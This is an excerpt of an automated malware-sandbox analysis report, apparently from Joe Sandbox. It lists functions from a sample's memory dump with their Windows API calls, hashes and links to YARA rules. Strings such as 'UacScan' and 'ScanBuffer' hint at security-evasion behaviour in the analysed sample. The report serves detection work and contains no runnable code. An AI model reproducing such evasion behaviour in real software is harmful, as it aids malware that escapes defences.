RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
RegSetValueExA.ADVAPI32(00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
RegCloseKey.ADVAPI32(00000900,00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
Instruction ID: f606575ae45da6468a978fbeed0b42716142a2fb6fe5f03ac61dbf3ab40ceb67
Opcode Fuzzy Hash: 3bda509cbd0030ad49cae28b5463df5f57e964b99a90ced8bc5b970ff279b1eb
Instruction Fuzzy Hash: FD110371A10314AFE701EBA4DC819AD7BBDEB49750F5005A1FA08D7650D734DE45CE61

Function 02B3E6B8 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02C75914), ref: 02B3E6FC
RegSetValueExA.ADVAPI32(00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E734
RegCloseKey.ADVAPI32(00000900,00000900,00000000,00000000,00000001,00000000,0000001C,00000000,02B3E767), ref: 02B3E73F

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
Instruction ID: c8121d2c3b9e1f3927617ade14a9987146b90d8259490800ccdc2d05c24774b8
Opcode Fuzzy Hash: e4d33faea1f7bf83cdc0f58fcaed900246599f581c551c8a6db067d1e01106dc
Instruction Fuzzy Hash: 58110371A10314AFE701EBA4D88199D7BBDEB49750F5005A1F608D7650D734DA45CE61

Function 02B2E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02B2E2F3

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
Instruction ID: ac36e5fc09ac2e5a5db20bfa2257a53e0431beb31e33cb5368e76ff476ffc371
Opcode Fuzzy Hash: 5f4ed32e867129e1b64842fd0a611a34719714eb024ebffc4fd2714be8007d3a
Instruction Fuzzy Hash: 02F0C861718330C79B227B3B9E845AD27969F0874275494E5A44E9B205CB24EC0DCB62

Function 02B24CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A
SysAllocStringLen.OLEAUT32(?,?), ref: 02B24D07
SysFreeString.OLEAUT32(00000000), ref: 02B24D19

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
Instruction ID: 6c3f78a8d2133a0a27c54277c824a072fa3944722b1e73d9c2f04514de68636a
Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
Instruction Fuzzy Hash: 7FE012B81153216EEF182F299C40B37373AEFC1751B5454D9B84CCA555D734C449AD34

Function 02B3705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02B3735A

Strings

H, xrefs: 02B37111

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
Instruction ID: bdf4cf3cc3a075be054efa66091c9afff1584f06097c7ae130a589e2b765ba8f
Opcode Fuzzy Hash: 5baef3381a6c8807b203f98fbb0906fcec12689b736a6d94da10fc836989e3e9
Instruction Fuzzy Hash: 7AB1D3B5A01608EFDB15CF99D980A9DFBF2FF4A314F1481A9E845AB360DB30A845DF50

Function 02B2E6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02B2E701

Part of subcall function 02B2E2E4: VariantClear.OLEAUT32(?), ref: 02B2E2F3

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
Instruction ID: 3859d639ccd92b464da088c1717b4148f827e8fe83a52248a4dc4fbe64e6451b
Opcode Fuzzy Hash: 811235bc3c524b9a37ccc01ed7704c2e3d01b5f70b1f2672f8d4b1283c1adafe
Instruction Fuzzy Hash: C311703070033097CB21EF6AC8C4A6A77AAEF5965071454E6E64E8B265DB30EC0DCAA1

Function 02B215CC Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02B21A03,?,02B22000), ref: 02B215E2

Strings

0`, xrefs: 02B2161D, 02B2163A

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AllocVirtual
String ID: 0`
API String ID: 4275171209-3339448193
Opcode ID: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
Instruction ID: 6bc3129b6980054ab98f3620fc1b0261f8c5fa94a0e7c892ea6541d6774eab5c
Opcode Fuzzy Hash: 74770d78a04eaccea8622cc4764d62a76287a81821f6db029c69c3f6f84861d8
Instruction Fuzzy Hash: 97F0F9F0B513004FEB05DF7999443057AE6EB89389F1485B9E709DB399E771D4198B10

Function 02B2E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02B2E3BC

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
Instruction ID: 37fb33052693bec0e8c91ee4d4b4f99e2090fef439e3d9e32e61c4891298f951
Opcode Fuzzy Hash: e1f4a774934ccf64ce3de86985de64d42dc11786b76b159386404469ce24c6d4
Instruction Fuzzy Hash: CE316F71600328ABDB11DEAAC984AAE77B8EB0C301F4845E1F91DD7250D334F958CB61

Function 02B36CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02B36D39,?,?,?,00000000), ref: 02B36D19

Part of subcall function 02B24C0C: SysFreeString.OLEAUT32(02B3E948), ref: 02B24C1A

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
Instruction ID: 6ca04686244a69351007b29f1fdcdee3a242afc09b583c784f1a87b73c4fa994
Opcode Fuzzy Hash: fdd3de3de25d8828470be5c9e07a3aaaed2ec7511f337b682fc536585ba7547a
Instruction Fuzzy Hash: 8BE0E530200354BFE312EBA5CC0195A77BDDB49B40B5108F1B804D7510DA305D088864

Function 02B25814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B25832

Part of subcall function 02B25A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B20000,02B4D790), ref: 02B25A94
Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AB2
Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B20000,02B4D790), ref: 02B25AD0
Part of subcall function 02B25A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B25AEE
Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B25B37
Part of subcall function 02B25A78: RegQueryValueExA.ADVAPI32(?,02B25CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B25B7D,?,80000001), ref: 02B25B55
Part of subcall function 02B25A78: RegCloseKey.ADVAPI32(?,02B25B84,00000000,?,?,00000000,02B25B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B25B77

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction ID: ec2e068fef510ae88d5aa20802f0e3d832a6390947f2cf17fbe46fbc01d70543
Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
Instruction Fuzzy Hash: 20E06D71A003248BCB24DE5C88C0A5637D8AB08750F4005A5EC58DF34AD3B0E9588BD0

Function 02B27D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B27DA8

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction ID: 5be0ff0480d8eec0c22653ce75bdf1a026931da633dce5af00bb0e8753da3c6e
Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
Instruction Fuzzy Hash: 32D05BB23082507AD220955A5C44EFB6BDCCFC9770F100679B65CC3180D7208C0587B1

Function 02B27E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B42A41,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanBuffer,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,Initialize), ref: 02B27E3F

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction ID: d7678910550ce20209b4aa3b702b079867ba496f6357d968b5c572fa92964d48
Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
Instruction Fuzzy Hash: 84C08CB02123280E1E50B2FC0CC450E428C8B052383B02FE1E63CD61D2DB25D85E3430

Function 02B27E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,02B3F8C4,ScanString,02B8137C,02B4AFD0,OpenSession,02B8137C,02B4AFD0,ScanString,02B8137C,02B4AFD0,UacScan,02B8137C,02B4AFD0,UacInitialize), ref: 02B27E1B

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction ID: 080508bb58a6f946d11d0a9c625fc55499b04c5fa561b98b89af562099ce8e2e
Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
Instruction Fuzzy Hash: 6FC08CE02023220A1A50B1FC0CC402A428C8B091383A42FE2E63CEA2E2DB25882F3430

Function 02B24C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 02B24C37

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction ID: 7828a7fa3cc2a63a7fb7fddbea92434594ee396cb8bfdb4702b14bb4848097a4
Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
Instruction Fuzzy Hash: 03C012A261033447FB219A9C9CC075562DCDB09295B1410E1E40CD7241E3609C044665

Function 02B4BB48 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

timeSetEvent.WINMM(00002710,00000000,02B4BB3C,00000000,00000001), ref: 02B4BB58

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: Eventtime
String ID:
API String ID: 2982266575-0
Opcode ID: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
Instruction ID: 0678d62ecf99d55b22af7294a893d186f0bb4728c2d96bc1e9ce993ecea10482
Opcode Fuzzy Hash: ceed3d84f787894fee753d7bcb45271a28c025b12894e7e55ec63e83cb55bec4
Instruction Fuzzy Hash: CEC092F2BC03403FFA10A6A81CC2F271A8DE704B00F602492BB04EE2C2D5E288645A60

Function 02B24BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

SysAllocStringLen.OLEAUT32(00000000,?), ref: 02B24BEB

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction ID: a5f777c4dcdd36b3a317a1ed1576bb3681e6a149bbaab4bc5b821cc76ba6ac65
Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
Instruction Fuzzy Hash: F2B0923825832269EE1412610D04B3210AC8B50287F8500D1AE2CC8480EB00C0088832

Function 02B24BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 02B24C03

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
Instruction ID: e651463e24f319c8827c7470e3241c4e437b8c0d113bdd894507220f4a01521c
Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
Instruction Fuzzy Hash: 0CA022AC0083330A8F0B232C000002A2033BFE03003CAE0E8200C0A000CF3A8008AC30

Function 02B21682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02B22000), ref: 02B216A4

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
Instruction ID: 1d79b50b0c22cdc729b8ca095956cb85fbf158e4ba4bf49645a447c39a526727
Opcode Fuzzy Hash: ab99b24b78f9437852ee2238797199b8a2498a67ac7677a0514832296f9c264e
Instruction Fuzzy Hash: 33F090B6A407A56FD711AE5E9C80786BB94FB00394F054579F94CA7341D770A818CBD4

Function 02B216E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02B21FE4), ref: 02B21704

Memory Dump Source

Source File: 00000004.00000002.2180282740.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true

Associated: 00000004.00000002.2180253170.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180405994.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180536591.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2180577063.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2b20000_x.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
Instruction ID: 6262fbca76cb8072c8e2e3ac14519ebcbf17b2491cee8cfd3457233760a87fc4
Opcode Fuzzy Hash: 2ba00299611f45ea70e58ecbe8b5427f13dd596bc4de90e946b7b25736447433
Instruction Fuzzy Hash: CBE086B53103216FE7105E7D5D407167BD8EB84654F1444B5F54DDB252D260E8188B60

Non-executed Functions

